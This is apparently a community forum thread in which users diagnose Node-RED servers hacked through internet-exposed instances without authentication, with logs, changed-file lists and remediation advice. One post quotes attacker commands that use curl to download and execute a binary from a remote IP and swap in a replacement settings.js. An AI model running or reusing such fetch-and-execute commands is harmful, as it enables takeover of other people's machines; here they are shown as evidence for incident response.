Dashboard suddenly asks for password (Hacked Node-RED servers)

Show us how you have commented it out and what the error is.

Have a look in /var/log/syslog and see if anything is logged there at 12:45

Do you mean it was accessible without any protection? If so then almost certainly you have been hacked.

could this have to do with it ?
these files were last changed at the time the problem appeard.
image

Check out the post above by @bakman2. You have most likely been hacked.

Just going back home disabled all port forwards that where enabled on router
The pi was accessible to the outside world but you do need a password to log into the pi.
But not to access nodered.
I will check the logs in a few.

16 Oct 18:26:58 - [info] Node-RED version: v2.1.3
16 Oct 18:26:58 - [info] Node.js version: v12.18.0
16 Oct 18:26:58 - [info] Linux 4.19.118-v7l+ arm LE
16 Oct 18:26:59 - [info] Loading palette nodes
Missing ENV var CONFIG_PATH
16 Oct 18:27:01 - [info] Dashboard version 3.1.2 started at /ui
16 Oct 18:27:01 - [info] Settings file : /home/pi/.node-red/settings.js
16 Oct 18:27:01 - [info] Context store : 'default' [module=memory]
16 Oct 18:27:01 - [info] User directory : /home/pi/.node-red
16 Oct 18:27:01 - [warn] Projects disabled : editorTheme.projects.enabled=false
16 Oct 18:27:01 - [info] Flows file : /home/pi/.node-red/flows.json
16 Oct 18:27:01 - [info] Creating new flow file
16 Oct 18:27:01 - [warn]

Your flow credentials file is encrypted using a system-generated key.
If the system-generated key is lost for any reason, your credentials
file will not be recoverable, you will have to delete it and re-enter
your credentials.
You should set your own key using the 'credentialSecret' option in
your settings file. Node-RED will then re-encrypt your credentials
file using your chosen key the next time you deploy a change.

16 Oct 18:27:01 - [info] Server now running at http://127.0.0.1:1880/
16 Oct 18:27:01 - [info] Starting flows
16 Oct 18:27:01 - [info] Started flows

After I commented the stuff out

Now here is the log file

pi@raspberrypi:~/.node-red $ node-red-log

16 Oct 18:27:01 - [info] Server now running at http://127.0.0.1:1880/
16 Oct 18:27:01 - [info] Starting flows
16 Oct 18:27:01 - [info] Started flows
Stopping Node-RED graphical event wiring tool...
16 Oct 19:29:30 - [info] Stopping flows
16 Oct 19:29:30 - [info] Stopped flows
nodered.service: Succeeded.
Stopped Node-RED graphical event wiring tool.
Started Node-RED graphical event wiring tool.
Error loading settings file: /home/pi/.node-red/settings.js
/home/pi/.node-red/settings.js:92
},;
^
SyntaxError: Unexpected token ';'
at wrapSafe (internal/modules/cjs/loader.js:1054:16)
at Module._compile (internal/modules/cjs/loader.js:1102:27)
at Object.Module._extensions..js (internal/modules/cjs/loader.js:1158:10)
at Module.load (internal/modules/cjs/loader.js:986:32)
at Function.Module._load (internal/modules/cjs/loader.js:879:14)
at Module.require (internal/modules/cjs/loader.js:1026:19)
at require (internal/modules/cjs/helpers.js:72:18)
at Object. (/usr/lib/node_modules/node-red/red.js:136:20)
at Module._compile (internal/modules/cjs/loader.js:1138:30)
at Object.Module._extensions..js (internal/modules/cjs/loader.js:1158:10)
nodered.service: Succeeded.

Sorry Iā€™m doing this off of my phone taking much longer

If you didn't need a password to open node-red then I think there is no doubt that you have been hacked. I suggest you erase the SD card and start again. The logs are no longer relevant.

If you have any other machines on the system that were accessible from the pi without entering a password then I think you should think seriously about whether other machines may have also been compromised.

3 Likes

Indeed it seems to be.
When I look into the syslog it all went fast, in about 5 seconds.
Anyway, I closed all the ports to get access to the system from the internet.
The node-red json files seem to be OK. I migrated them to another instance of node-red, with an other port.
I also delete the xterm files in de modules folder. They were installed at the time of the hack.

As others have suggested - at this point I would assume other parts of your machine have been compromised - and that it would be unsafe to continue to use it without completely wiping the SD card and starting again.

Hi all, got same issue yesterday, i checked the Settings.js file and was edited at 23:34
authentication was uncommented.

when i check the terminal i see three lines i didn't add.

" apt update -y; apt install curl cron nano -y; service cron start; uname -a"
"cd /tmp; curl -o php http://XX.XX.XX.XX/a-r.m-6.ISIS; chmod +x php; ./php; rm -rf php"
"d ~/.node-red; mv settings.js test.js; curl -o settings.js http://XX.XX.XX.XX/nodered.txt; node-red-restart"

any suggestions what they wanted to do? and how to undo this

Thank you all so much I replaced my settings.js file with an instance of node red that was working
and also deleted the (xterm folders) I see that it added a terminal window in node-red near the drop down where you find Dashboard.
image
I will now have to secure my node red or setup a vpn and also probably a good idea to wipe and start over.
Thank all so much again greatly appreciated.

Nice understatement.

@Steven1 has posted evidence of the hack downloading a program from a server in Russia and executing it.
Whatever that does, it's surely not confined to Node-red.

So if your Node-red machine was attacked and is ARM based it is thoroughly compromised.
It's a safe bet the attack will have attempted to access other computers on your network.

You could just hope that you don't have ransomware on your devices, and you are not now part of a bot net...

Same issue here !

I found the following files changed on oct 16 21:26

.config.json
settings.js
package.json
package-lock.json

node_modules/
node-red-contrib-xterm
npmlog
number-is-nan
prebuild-install
set-blocking
simple-concat
simple-get
string-width
strip-ansi
tar-fs
xterm
wide-align
xterm-addon-fit

So:
I restored .config.json and settings.js from an older backup.
I deleted the xterm folders from node_modules
I removed all xterm lines from package.json and package-lock.json.

And after rebooting my node-red works again.

Still wondering HOW this could happen, since I use non-standard usernames and passwords everywhere and I use personal certificates for SSH.

Did you have any ports open to the internet?

  • Are you using node-red basic auth?
    • i.e. did your node-red required a username and password BEFORE this happened?
  • Do you have firewall rules to restrict access?
  • Do you run node-red as root or sudo or a user with admin/sudo capability?

Do you mean you have opened node-red to the internet again, not using https and without setting user and passwords for access, but with a non-standard port? If so then that is not sufficient. Never open your machine via any port unless you are using https with good passwords.

Yeah, but AFAIK those are needed for Node-RED Google Assistant Bridge and Node-RED Smart Home Control.

Unfortunately not :=((
But you can't enter a shell or change the settings/config from the ui isn't it?

Yes I use a firewall, but what firewall rules do you mean and restrict on what?

runs as "pi", and pi has a non-default password